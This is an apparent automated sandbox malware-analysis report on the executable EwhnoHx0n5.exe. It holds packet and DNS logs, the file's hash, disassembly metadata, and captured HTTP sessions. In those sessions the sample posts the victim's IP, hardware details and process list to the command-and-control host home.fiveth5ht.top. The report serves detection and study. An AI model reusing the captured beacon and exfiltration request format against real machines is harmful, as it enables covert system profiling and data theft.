                                                      Dec 27, 2024 09:07:45.809837103 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809931040 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809940100 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809974909 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810039043 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810128927 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810146093 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810235023 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810333967 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810343027 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810350895 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810466051 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810511112 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810551882 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810606003 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810700893 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810709953 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810817003 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810827017 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810899973 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810909033 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810964108 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.810987949 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811079025 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811098099 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811175108 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811302900 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811317921 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811327934 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.811338902 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.851367950 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.902848005 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.902954102 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925443888 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925576925 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925590038 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925733089 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925770044 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925854921 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.925882101 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.926136971 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.926206112 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.927213907 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927233934 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927350998 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927419901 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927429914 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927464962 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927577972 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927613974 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927757025 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927766085 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927875042 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.927894115 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928046942 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928056955 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928111076 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928136110 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928261042 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928270102 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928369999 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928432941 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928550005 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928558111 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928644896 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928689957 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928780079 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.928860903 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929030895 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929040909 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929193974 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929238081 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929279089 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929397106 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929405928 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929425955 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929491997 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929502964 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929606915 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929616928 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929698944 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929735899 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929908991 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.929919004 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930005074 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930039883 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930128098 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930175066 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930257082 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930294037 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930378914 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930389881 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930474997 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930485964 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930648088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.930732965 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.931967974 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.932029963 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:46.046199083 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046277046 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046343088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046353102 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046360016 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046369076 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046461105 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046473026 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046570063 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046674013 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046777964 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046832085 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.046957970 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047002077 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047106981 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047132969 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047285080 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047307014 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047466040 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047498941 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047584057 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047621965 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047734022 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047745943 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047818899 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047844887 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047919989 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.047960997 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048057079 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048100948 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048140049 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048183918 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048221111 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048285007 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:46.048394918 CET80497275.101.3.217192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Dec 27, 2024 09:07:39.184051037 CET | 64207 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 09:07:39.184245110 CET | 64207 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 09:07:39.322045088 CET | 53 | 64207 | 1.1.1.1 | 192.168.2.9
Dec 27, 2024 09:07:39.322060108 CET | 53 | 64207 | 1.1.1.1 | 192.168.2.9
Dec 27, 2024 09:07:43.927783966 CET | 64210 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 09:07:43.928049088 CET | 64210 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 09:07:44.069211960 CET | 53 | 64210 | 1.1.1.1 | 192.168.2.9
Dec 27, 2024 09:07:44.366570950 CET | 53 | 64210 | 1.1.1.1 | 192.168.2.9
Dec 27, 2024 09:07:48.703535080 CET | 64212 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 09:07:48.703603029 CET | 64212 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 09:07:48.841248035 CET | 53 | 64212 | 1.1.1.1 | 192.168.2.9
Dec 27, 2024 09:07:48.841331959 CET | 53 | 64212 | 1.1.1.1 | 192.168.2.9
Dec 27, 2024 09:07:50.501193047 CET | 64214 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 09:07:50.501250029 CET | 64214 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 09:07:50.639044046 CET | 53 | 64214 | 1.1.1.1 | 192.168.2.9
Dec 27, 2024 09:07:50.639061928 CET | 53 | 64214 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Dec 27, 2024 09:07:39.184051037 CET | 192.168.2.9 | 1.1.1.1 | 0x4a4c | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:39.184245110 CET | 192.168.2.9 | 1.1.1.1 | 0xbf9 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 27, 2024 09:07:43.927783966 CET | 192.168.2.9 | 1.1.1.1 | 0x102c | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:43.928049088 CET | 192.168.2.9 | 1.1.1.1 | 0x177a | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 09:07:48.703535080 CET | 192.168.2.9 | 1.1.1.1 | 0x2649 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:48.703603029 CET | 192.168.2.9 | 1.1.1.1 | 0x26f3 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 09:07:50.501193047 CET | 192.168.2.9 | 1.1.1.1 | 0x7379 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:50.501250029 CET | 192.168.2.9 | 1.1.1.1 | 0x314 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Dec 27, 2024 09:07:33.777765036 CET | 1.1.1.1 | 192.168.2.9 | 0xe748 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 09:07:33.777765036 CET | 1.1.1.1 | 192.168.2.9 | 0xe748 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:39.322045088 CET | 1.1.1.1 | 192.168.2.9 | 0x4a4c | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:39.322045088 CET | 1.1.1.1 | 192.168.2.9 | 0x4a4c | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:44.069211960 CET | 1.1.1.1 | 192.168.2.9 | 0x102c | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:48.841248035 CET | 1.1.1.1 | 192.168.2.9 | 0x2649 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:07:50.639044046 CET | 1.1.1.1 | 192.168.2.9 | 0x7379 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
                                                      • httpbin.org
                                                      • home.fiveth5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
0 | 192.168.2.9 | 49727 | 5.101.3.217 | 80 | 1688 | C:\Users\user\Desktop\EwhnoHx0n5.exe
Timestamp: Dec 27, 2024 09:07:44.544317007 CET
Bytes transferred: 12360
Direction: OUT
Data:
POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
Host: home.fiveth5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 560227
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "8485909137206435916", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe" [TRUNCATED]
                                                      Data Ascii: GPjn4UfFLwv\/wAE3v2nPgp8MbN\/DHjSbxH4D+MPjj\/gpsnxy+Gnh238b2Xh26s7LxdYfs5rceJ9N+JGkeIE07w3rtnALTxdpXxDg062T76uND0S7kWa60fSrmZcbZbjT7SaRcYxteSFmGMDGDxgelRHw54eLiQ6DopkUYVzpdiXA54DeRkDk8A9z6muLin6GuVcS8TZ3xJHjfO8tq57nGNzXFUMJSoxt9e4bxPC06CrLlqzh
                                                      Timestamp:Dec 27, 2024 09:07:48.636255980 CET
                                                      Bytes transferred:157
                                                      Direction:IN
                                                      Data:HTTP/1.1 200 OK
                                                      Server: nginx/1.22.1
                                                      Date: Fri, 27 Dec 2024 08:07:48 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 1
                                                      Connection: close
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session ID:1
                                                      Source IP:192.168.2.9
                                                      Source Port:49738
                                                      Destination IP:5.101.3.217
                                                      Destination Port:80
                                                      PID:1688
                                                      Process:C:\Users\user\Desktop\EwhnoHx0n5.exe
                                                      Timestamp:Dec 27, 2024 09:07:48.963059902 CET
                                                      Bytes transferred:98
                                                      Direction:OUT
                                                      Data:GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                      Host: home.fiveth5ht.top
                                                      Accept: */*
                                                      Timestamp:Dec 27, 2024 09:07:50.432768106 CET
                                                      Bytes transferred:372
                                                      Direction:IN
                                                      Data:HTTP/1.1 404 NOT FOUND
                                                      Server: nginx/1.22.1
                                                      Date: Fri, 27 Dec 2024 08:07:50 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 207
                                                      Connection: close
                                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                      Session ID:2
                                                      Source IP:192.168.2.9
                                                      Source Port:49744
                                                      Destination IP:5.101.3.217
                                                      Destination Port:80
                                                      PID:1688
                                                      Process:C:\Users\user\Desktop\EwhnoHx0n5.exe
                                                      Timestamp:Dec 27, 2024 09:07:50.760302067 CET
                                                      Bytes transferred:171
                                                      Direction:OUT
                                                      Data:POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                      Host: home.fiveth5ht.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 31
                                                      Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                      Data Ascii: { "id1": "0", "data": "Done1" }
                                                      Timestamp:Dec 27, 2024 09:07:52.371377945 CET
                                                      Bytes transferred:372
                                                      Direction:IN
                                                      Data:HTTP/1.1 404 NOT FOUND
                                                      Server: nginx/1.22.1
                                                      Date: Fri, 27 Dec 2024 08:07:52 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 207
                                                      Connection: close
                                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                      Session ID:0
                                                      Source IP:192.168.2.9
                                                      Source Port:49716
                                                      Destination IP:3.218.7.103
                                                      Destination Port:443
                                                      PID:1688
                                                      Process:C:\Users\user\Desktop\EwhnoHx0n5.exe
                                                      Timestamp:2024-12-27 08:07:41 UTC
                                                      Bytes transferred:52
                                                      Direction:OUT
                                                      Data:GET /ip HTTP/1.1
                                                      Host: httpbin.org
                                                      Accept: */*
                                                      Timestamp:2024-12-27 08:07:41 UTC
                                                      Bytes transferred:224
                                                      Direction:IN
                                                      Data:HTTP/1.1 200 OK
                                                      Date: Fri, 27 Dec 2024 08:07:41 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 31
                                                      Connection: close
                                                      Server: gunicorn/19.9.0
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: true
                                                      Timestamp:2024-12-27 08:07:41 UTC
                                                      Bytes transferred:31
                                                      Direction:IN
                                                      Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                      Data Ascii: { "origin": "8.46.123.189"}



                                                      Target ID:0
                                                      Start time:03:07:35
                                                      Start date:27/12/2024
                                                      Path:C:\Users\user\Desktop\EwhnoHx0n5.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\EwhnoHx0n5.exe"
                                                      Imagebase:0x450000
                                                      File size:4'462'592 bytes
                                                      MD5 hash:4C88FF06E9F5D8AAF6B642EB809DD2FF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:3.9%
                                                        Dynamic/Decrypted Code Coverage:34.7%
                                                        Signature Coverage:13.7%
                                                        Total number of Nodes:481
                                                        Total number of Limit Nodes:50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                        • API String ID: 0-1590685507
                                                        • Opcode ID: e5a7b5247265b94dbe9179faa806585c399acb0d7b36150a7469039cf7b615f9
                                                        • Instruction ID: 2b2651ed9aca515b0c9656d09b36761b09a1cac0f78f4f7f49aedd159c70611b
                                                        • Opcode Fuzzy Hash: e5a7b5247265b94dbe9179faa806585c399acb0d7b36150a7469039cf7b615f9
                                                        • Instruction Fuzzy Hash: D1C2A031A043449FD714DF29C444B6BBBE1BF84318F088A6EEC989B352D775E989CB85

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE ref: 00452579
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 004525CC
                                                        • GetDriveTypeA.KERNELBASE ref: 00452647
                                                        • GetDiskFreeSpaceExA.KERNELBASE ref: 0045267E
                                                        • KiUserCallbackDispatcher.NTDLL ref: 004527E2
                                                        • FindFirstFileW.KERNELBASE ref: 004528F8
                                                        • FindNextFileW.KERNELBASE ref: 0045291F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        Similarity
                                                        • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                        • String ID: ;%E$@$`
                                                        • API String ID: 3271271169-2507970851
                                                        • Opcode ID: 48e50ca9a661253d6958c34b688bd6dbdd0619d31737cf82a8253aaea3397d41
                                                        • Instruction ID: d7c96837059fee49195163c2488ef2a66e89ac3df4410707448dd08623124be6
                                                        • Opcode Fuzzy Hash: 48e50ca9a661253d6958c34b688bd6dbdd0619d31737cf82a8253aaea3397d41
                                                        • Instruction Fuzzy Hash: E9D193B49097199FCB10EF68C59569EBBF0FF48344F00896AE898D7311E7749A84CF92

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                        • String ID: 0
                                                        • API String ID: 2406880114-4108050209
                                                        • Opcode ID: 97f551e616e4072261a043b32f3913c398c0d9bd9eb90a10a6fdf427c3a522e6
                                                        • Instruction ID: 0253cf3ab2c0316cfcba953ddcd91938a51005e6d7065b572ba3cbfd49e37135
                                                        • Opcode Fuzzy Hash: 97f551e616e4072261a043b32f3913c398c0d9bd9eb90a10a6fdf427c3a522e6
                                                        • Instruction Fuzzy Hash: B5E1F9B49043059FCB50EF68D98569EBBF5EF48340F00886EE898D7351EB789949CF46

                                                        Control-flow Graph

                                                        APIs
                                                        • WSAEventSelect.WS2_32(?,?,?), ref: 00460711
                                                        • WSAEventSelect.WS2_32(?,?,00000000), ref: 004609DC
                                                        • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004609FC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        Similarity
                                                        • API ID: EventSelect$EnumEventsNetwork
                                                        • String ID: N=E$multi.c
                                                        • API String ID: 2170980988-170292696
                                                        • Opcode ID: 02dd7a3fdff9b9d760d30b6ebe39eb27e106d9cc6ff3f4828bd74b41283768e0
                                                        • Instruction ID: 46a2da0fd4f92bd6676781c5da003d0846e29c3c875a779eadebfa1684abc994
                                                        • Opcode Fuzzy Hash: 02dd7a3fdff9b9d760d30b6ebe39eb27e106d9cc6ff3f4828bd74b41283768e0
                                                        • Instruction Fuzzy Hash: 87D1ADB16083019FE710DF64C881B6BB7E9BF94349F04482EF88586282F778E959DB57
                                                        APIs
                                                        • getsockname.WS2_32(-00000020,-00000020,?), ref: 0051B2B7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID: ares__sortaddrinfo.c$cur != NULL
                                                        • API String ID: 3358416759-2430778319
                                                        • Opcode ID: 8ad33cb1fa7416a2c9d60e1b3f3e9870f0fda74bb2431e8939daa0deabb840fa
                                                        • Instruction ID: 940cb7bf69bacf2293c9af06d45b6f89607ff888f3df7a9628ef45f2c16a0ec7
